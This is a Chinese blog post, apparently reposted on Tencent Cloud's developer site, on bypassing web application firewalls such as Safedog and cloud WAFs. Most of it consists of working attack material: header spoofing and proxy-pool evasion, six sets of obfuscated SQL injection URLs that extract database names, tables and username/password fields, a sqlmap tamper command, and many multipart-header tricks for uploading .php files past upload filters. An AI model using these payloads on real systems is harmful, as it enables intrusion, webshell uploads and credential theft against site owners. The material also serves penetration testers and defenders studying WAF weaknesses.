文章/答案/技术大牛

发布

社区首页 >专栏 >一篇文章教给你Bypass学习基础

一篇文章教给你Bypass学习基础

天钧

发布于 2020-09-30 02:45:34

2.1K01

代码可运行

文章被收录于专栏：渗透云笔记渗透云笔记

运行总次数：1

代码可运行

一、网站防护分类

1.源码防护：

使用过滤函数对恶意攻击进行过滤，绕过思路： ①大小写替换 ②变换提交方式：如get请求变post/cookie请求绕过 ③编码绕过：url编码、基于语句重叠、注释符等

2.软件WAF： 通过访问速度、指纹识别等特征进行拦截；常见软件WAF如安全狗、D盾、云锁、云盾等，软件WAF侧重拦截web漏洞。通过访问阈值的大小判断为CC攻击，进行IP封锁；

3.硬件WAF： 主要防御流量和部分web攻击。常见硬件WAF如天融信、深信服等厂商的防火墙。硬件WAF基于TCP三次握手封锁真实IP；

4.云WAF：

阿里云等

二、 WAF拦截方向

1.基于IP封锁

①基于HTTP请求头封锁IP 使用burp suite插件fake-ip进行绕过

client-ip:1.1.1.1
x-forward-for:1.1.1.1

②基于TCP请求封锁IP

使用IP代理池不断切换真实IP

2.指纹识别-修改扫描工具特有指纹

每个扫描工具都有特定的指纹，这里说的指纹是指http请求头里面的User-Agent。WAF一旦识别到工具的指纹会直接封锁请求IP，所以在进行攻击时需要修改指纹欺骗WAF，不同工具的修改方式不同，具体百度：

DirBuster：

sqlmap：注入时添加–radom-agent参数，也可以使用–User-Agent="xx”参数指定指纹进行注入攻击

3.访问速度和web攻击 waf存在访问阈值，如果单个IP访问速度过快会被waf当作ddos或者cc攻击从而进行拦截。另外基于web层面的攻击也会被拦截，例如：在web页面进入sql注入或者xss的payload会被waf拦截关键字，进行文件上传时会检测上传文件后缀和文件内容等…

4.总结 从IP封锁、访问速度、指纹信息以及web攻击等多个维度进行bypass。

三、目录扫描

1.子域名查找 子域名查询利用第三方接口查询。避免waf拦截 ①shodan、fofa ②谷歌语法 ③其他接口

http://z.zcjun.com/
https://phpinfo.me/domain/
https://d.chinacycc.com/index.php?m=Login&a=index

2.目录扫描

使用代理池：ProxyPool-mater

项目地址：https://github.com/Python3WebSpider/ProxyPool

①本地安装redis，安装教程：

https://www.runoob.com/redis/redis-install.html

②运行代理池脚本，抓取代理IP并筛选然后存放到redis库里面：

#开启redis服务
cd ./redis
redis-server redis.windows.conf

#运行脚本ProxyPool-master
cd ./ProxyPool-master
python run.py

③运行成功后会在本机开放一个接口从而获取redis库里面的IP，并随机切换：

接口地址：127.0.0.1:5555/random

④然后利用网站目录扫描脚本调用此IP进行目录扫描，脚本实现方式：

调用本地接口获取代理IP

运行脚本，成功bypass

ps：sqlmap使用代理池IP：将IP保存在1.txt里面，使用–proxy-file="c:\1.txt"参数进行代理IP切换

四、手工注入

1.参数污染

①注释、空字符、内联注释、脏数据、单行注释、换行符等污染

access+asp空格：  %0a %0d %09 %20 +

②长度污染：waf拦截长度有一定的限制，一般用与post提交的时候，使用垃圾字符提交内容导致内存溢出：

%%&%%%%%%%%%%%%%%%%%%%%%%%%%%0a
id=1&id=1&id=1&id=1&id=1&id=1&id=1 and 1=1

③变换提交方式（服务器支持post、cookie传参）

直接get提交被安全狗拦截：

变换为post提交方式成功bypass：

2.实例：六条语句bypass安全狗

环境：安全狗4.0 IIS版本+mysql 5.4+IIS 7.5

第一种：特殊数字+内敛注释

#在1-55000之间找特殊数字，这个数字表示数据库版本。数据库是4.45.09以上版本该语句才会被执行
id=-1%20union%20/*!44509select*/%201,2,3%23
id=-1%20union%20/*!44509select*/%201,%23x%0A/*!database*/(),3%23

ps：我发现在这个区间只要带44的数字都不拦截，不知道这是不是一枚彩蛋。

#找数字列
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,2,3,4,5,6,7,8,9,10
#数据库名
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,database%23%0a(),3,4,5,6,7,8,9,10

#表名
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=0x7879636d73

#字段名
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x6d616e6167655f75736572

#字段内容
showproducts.php?id=-13/*!10444union*//*!10444%23*/%0a/*!10444select*/1,group_concat(m_name,m_pwd),3,4,5,6,7,8,9,10 from manage_user

**第二种union/%00/%23a%0A/!/!select 1,2,3*/;%23**

#字段数
?id=1/*%00*/%23a%0A/*!/*!order*/+/*%00*/%23a%0A/*!/*!by+3*/--+

#数字列
?id=-1 union/*%00*/%23a%0A/*!/*!select 1,2,3*/;%23

#数据库
?id=-1+union/*%00*/%23a%0A/*!/*!select 1,database%23%0a(),3*/;%23

#表名
?id=-1+union/*%00*/%23a%0A/*!/*!select*/1,group_concat(%23%0atable_name),3 from information_schema.tables where table_schema=0x7365637572697479;%23

#字段名
?id=-1+union/*%00*/%23a%0A/*!/*!select*/1,group_concat(%23%0acolumn_name),3 from information_schema.columns where table_name=0x7573657273;%23

#字段内容
?id=-1+union/*%00*/%23a%0A/*!/*!select*/1,group_concat(%23%0a0x7E,username,password),3 from security.users;%23

第三种：/&id=-1%20union%20select%201,2,3%23*/**

#字段数：
?id=1/**&id=1%20order by 3%23*/

#数据库名
?id=1/**&id=-1%20union%20select%201,database(),3%23*/

#表名
?id=1/**&id=-1%20union%20select%201,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479%23*/

#字段名
?id=1/**&id=-1%20union%20select%201,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273%23*/

#字段内容
?id=1/**&id=-1%20union%20select%201,group_concat(0x7e,username,password),3 from users%23*/

#字段数
?id=1%20order%20%23%0a%20by%203%23

#数据库
?id=-1%20union%20all%23%0a%20select%201,database%23%0a(),3%23

#表名
?id=-1%20union%20all%23%0a%20select%201,group_concat(%23%0atable_name),3 from information_schema.tables where table_schema=0x7365637572697479%23

#字段名
?id=-1%20union%20all%23%0a%20select%201,group_concat(%23%0acolumn_name),3 from information_schema.columns where table_name=0x7573657273%23

#字段内容
?id=-1%20union%20all%23%0a%20select%201,group_concat(%23%0a0x7e,username,password),3 from users%23

第五种：字符型

– - 是mysql的注释符然后加上%0a 换行。安全狗正则匹配order by,union select。并不单纯匹配某一个单词函数-- -a%0a

#字段数
?id=1 order -- -a%0a by 3%23

#数据库
?id=-1 union-- -a%0a select 1,database-- -a%0a(),3%23

#表名
?id=-1 union-- -a%0a select 1,group_concat(-- -a%0atable_name),3 from information_schema.tables where table_schema=0x7365637572697479%23

#字段名
?id=-1 union-- -a%0a select 1,group_concat(-- -a%0acolumn_name),3 from information_schema.columns where table_name=0x7573657273%23

#字段内容
?id=-1 union-- -a%0a select 1,group_concat(-- -a%0a0x7e,username,password),3 from users%23

第六种：

贴图太累了，放弃

#数据库
?id=\Nunion/*!14444select*/1,database(%23%0a),3

3. tamper编写

可以对已经存在的tamper加上上面的payload进行魔改，例如：在tamper versionedmorekeywords.py里面进行替换：

替换完成后使用该tamper就可以过狗了：

sqlmap -u "http://192.168.198.129:86/Less-2/?id=1" --tamper=safedog.py --ramdom-agent --delay=0.5

文件上传

环境同上。

①截断

②去掉引号

③引号

引号2

引号3

④filename

filename2

⑤换行

换行2

上传绕过思路

1.对文件的内容，数据。数据包进行处理。

Content-Disposition: form-data; name="file"; filename="ian.php"
# 将form-data;修改为~form-data，即：
Content-Disposition: ~form-data; name="file"; filename="ian.php"

2.通过替换大小写来进行绕过

Content-Disposition: form-data; name="file"; filename="yjh.php"
Content-Type: application/octet-stream
#将Content-Disposition修改为content-Disposition
Content-Disposition: form-data; name="file"; filename="yjh.php"
#将form-data修改为Form-data
Content-Disposition: Form-data; name="file"; filename="yjh.php"
#将Content-Type修改为content-Type
content-Type: application/octet-stream

3.通过删减空格来进行绕过

Content-Disposition: form-data; name="file"; filename="yjh.php"
Content-Type: application/octet-stream
将Content-Disposition: form-data //冒号后面 增加或减少一个空格
将form-data; name="file";   //分号后面 增加或减少一个空格
将Content-Type: application/octet-stream //冒号后面 增加一个空格

4.通过字符串拼接绕过

看Content-Disposition: form-data; name="file"; filename="yjh3.php"
将 form-data 修改为   f+orm-data
将 from-data 修改为   form-d+ata

5.双文件上传绕过

<form action="https://www.xxx.com/xxx.asp(php)" method="post"
name="form1" enctype="multipart/form‐data">
<input name="FileName1" type="FILE" class="tx1" size="40">
<input name="FileName2" type="FILE" class="tx1" size="40">
<input type="submit" name="Submit" value="上传">
</form>

6.HTTP header 属性值绕过

Content-Disposition: form-data; name="file"; filename="yjh.php"
//通过替换form-data 为*来绕过
Content-Disposition: *; name="file"; filename="yjh.php"

7.HTTP header 属性名称绕过

源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下：
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
C.php"
删除掉ontent-Type: image/jpeg只留下c，将.php加c后面即可，但是要注意额，双引号要跟着c.php".

8.等效替换绕过

原内容：
Content-Type: multipart/form-data; boundary=---------------------------471463142114
修改后:
Content-Type: multipart/form-data; boundary =---------------------------471463142114
boundary后面加入空格。

9.修改编码绕过

使用UTF-16、Unicode、双URL编码等等

10.百度云上传绕过

Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php"
或者：
filename='1.php(回车)'

11.阿里云上传绕过

源代码：
Content-Disposition: form-data; name="img_crop_file"; filename="1.jpg .Php"Content-Type: image/jpeg
修改如下：
Content-Disposition: form-data; name="img_crop_file"; filename="1.php"
将=号这里回车删除掉Content-Type: image/jpeg即可绕过。

12.360主机上传绕过

源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下：
Content- Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
Content-Disposition 修改为 Content-空格Disposition

13.===绕过

Content- Disposition: form-data; name="upload"; filename==="1.php"

14.云锁上传绕过

Content- Disposition: form-data; name="up_picture"; filename==="123.
11.php"

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2020-09-24，如有侵权请联系 cloudcommunity@tencent.com 删除

tcp/ip

本文分享自渗透云笔记微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

暂无评论

编辑精选文章

换一批

万字详解高可用架构设计

2980

Go 开发者必备：Protocol Buffers 入门指南

亿级月活的社交 APP，陌陌如何做到 3 分钟定位故障？

1712

60页PPT全解：DeepSeek系列论文技术要点整理

2894

SQLi_Labs通关文档【1-65关】

云数据库 SQL Server sql 数据库网络安全 tomcat

为了不干扰自己本机环境，sql-lab我就用的docker跑起来的，搭建也非常简单，也就两条命令

HACK学习

2019/08/05

4K1

sqli-labs通关笔记(1-30)

网络安全安全 sql 数据库

sqli-labs是一款练习sql注入的著名靶场。而造成SQL注入的原因是服务器端未严格校验客户端发送的数据,而导致服务端SQL语句被恶意修改并成功执行的行为称为SQL注入。通过本文将sqli-la

逍遥子大表哥

2022/04/15

2.3K0

【Bypass】安全狗apache V4.0.23137 SQL注入绕过

http python 数据库 sql 腾讯云开发者社区

乌鸦安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

乌鸦安全

2022/04/15

9800

文件上传Bypass安全狗

php html

我们知道WAF分为软WAF，如某狗，某盾等等；云WAF，如阿里云CDN，百度云CDN等等；硬WAF，如天融信，安恒等等，无论是软WAF、云WAF还是硬WAF，总体上绕过的思路都是让WAF无法获取到文件名或者其他方式无法判断我们上传的木马（PHP、JSP、ASP、ASPX等等）。

HACK学习

2021/06/24

1.3K0

Bypass 360主机卫士SQL注入防御（多姿势）

php sql 网络安全 http

在服务器客户端领域，曾经出现过一款 360 主机卫士，目前已停止更新和维护，官网都打不开了，但服务器中依然经常可以看到它的身影。

信安之路

2018/08/08

1.5K0

Pentester之SQL过关纪实

php http https 网络安全

web for pentester是国外安全研究者开发的的一款渗透测试平台，通过该平台你可以了解到常见的Web漏洞检测技术,如：XSS跨站脚本攻击、SQL注入、目录遍历、命令注入、代码注入、XML攻击、LDAP攻击、文件上传。靶场介绍可以查看官方网站[1]靶场环境搭建方法可以参考文章[2]，先从SQL注入顺手练练

网络安全自修室

2020/08/21

5440

实战 | WAF-Bypass之SQL注入绕过思路总结

php postgresql 云数据库 postgresql http https

如果流量都没有经过WAF，WAF当然无法拦截攻击请求。当前多数云WAF架构，例如百度云加速、阿里云盾等，通过更改DNS解析，把流量引入WAF集群，流量经过检测后转发请求到源站。如图，dict.com接入接入WAF后，dict.com的DNS解析结果指向WAF集群，用户的请求将发送给WAF集群，WAF集群经过检测认为非攻击请求再转发给源站。

HACK学习

2022/02/17

5.1K0

SQL注入安全狗apache4.0.26655绕过

网络安全云数据库 SQL Server 腾讯云开发者社区 sql 数据库

本次靶场采用经典的sqli-labs搭建，waf使用的是安全狗的apache4.0.26655版本，文章从最开始的分析到最后的结果，中间难免会有错误的地方，希望大家多多包涵和理解。

乌鸦安全

2021/08/05

8260

实战｜记一次内网靶机渗透测试

网站 php

可以看到如果ad_id不为空就删除两边的空白符号，否则输出Error，然后就会执行getone方法，跟踪下getone。

HACK学习

2021/08/13

9300

那些可以绕过WAF的各种特性

php 数据库 sql 爬虫 unicode

在攻防实战中，往往需要掌握一些特性，比如服务器、数据库、应用层、WAF层等，以便我们更灵活地去构造Payload，从而可以和各种WAF进行对抗，甚至绕过安全防御措施进行漏洞利用。

Bypass

2020/03/26

1.7K0

浅谈WAF绕过技巧

其他

waf分类掌握绕过各类WAF可以说是渗透测试人员的一项基本技能，本文将WAF分为云WAF、硬件WAF、软件WAF、代码级WAF，分别从各自的特性来谈一些相关的绕过技巧，更侧重于针对基于规则类的WAF绕过技巧。云waf Eg:加速乐目前CDN服务的功能是越来越多，安全性也越加强悍，用户的每个请求都会被发送到指定的CDN节点上，最后转发给真实站点。这个过程就好像加了一道关卡，这个关卡提供了缓存、加速、防御的特点。绕过关键：查询真实IP，若是直接访问服务器的IP就不经过CDN了。以下四点有助于绕过： 1

FB客服

2018/02/26

3.9K0

意外发现一套cms的注入漏洞

http php 企业安全网络安全

事情是这样的某一天在一个安全交流群里聊天，一个朋友说他们老师叫他去检测下他们学校官网，后来朋友他找到了我让我帮助他进行安全检测。

ittongluren

2019/11/20

1K0

Getshell | 文件上传绕过整理

安全网络安全 http html

WAF绕过安全狗绕过 1.绕过思路：对文件的内容，数据。数据包进行处理。关键点在这里Content-Disposition: form-data; name="file"; filename="ian.php" 将form-data; 修改为~form-data; 2.通过替换大小写来进行绕过 Content-Disposition: form-data; name="file"; filename="yjh.php" Content-Type: application/octet

HACK学习

2019/11/14

3.3K0

Jarvis OJ inject

数据库 schema select table 数据

http://web.jarvisoj.com:32794/index.php~ 得到源码 <?php require("config.php"); $table = $_GET['t

wywwzjj

2023/05/09

4520

Bypass WAF （小白食用）

网络安全

前言：现在绕过waf手法在网上层出不穷，但是大家好像忘记一个事情就是，思路比方法更有价值，大家对着网上一些手法直接生搬硬套，不在意是不是适合的场景，网上的文章，好像着急的把所有的绕过方法都给你罗列出来。没有传授给你相应的技巧。到最后，小白拿着一堆绕waf的方法却被waf拦在外面。

亿人安全

2024/09/18

2750

超全sql注入实用语句_sql注入语句实例大全

http https ascii php 网络安全

目录判断是否存在注入判断列数 Union联合注入爆数据库爆表爆字段爆数据 sql盲注导入导出文件 Post注入修改useragent: 修改referer: 修改cookie gr

全栈程序员站长

2022/11/16

2.9K0

我的wafBypass之道

python 编程算法 sql 数据库云数据库 SQL Server

去年到现在就一直有人希望我出一篇关于waf绕过的文章，我觉得这种老生常谈的话题也没什么可写的。

用户1467662

2019/04/19

3K0

sql注入bypass最新版某狗

http php python 数据库 sql

红队蓝军

2022/05/17

2870

代码审计：BlueCMS v1.6

html 网络安全安全 sql 数据库

发现公众号上好像没什么代码审计的文章，于是便把之前自己的笔记拿过来给大家分享一下，这个cms基本已经被玩烂了，但是还是有一些学习意义的。

鸿鹄实验室

2021/04/01

2K0

经验分享 | 渗透笔记之Bypass WAF

http apache 网络安全安全

(1)cookie判断（例如Citrix,Netscaler,Yunsuo WAF,safedog） (2)有些人将自己与单独的标头关联（例如Anquanbao WAF,AmazonAWS WAF）。 (3)有些经常更改标头和混乱的字符以使攻击者感到困惑（例如Netscaler,Big-IP）。 (4)有些人在服务器头数据包中暴露自己（eg. Approach, WTS WAF） (5)一些WAF在响应内容body中公开自身（例如DotDefender,Armor,Sitelock） (6)其他WAF会对恶意请求做出不寻常的响应代码答复（例如WebKnight,360WAF) (7)有些WAF会返回一堆垃圾数据，卡死你(例如:百度云加速乐)

F12sec

2022/09/29

4320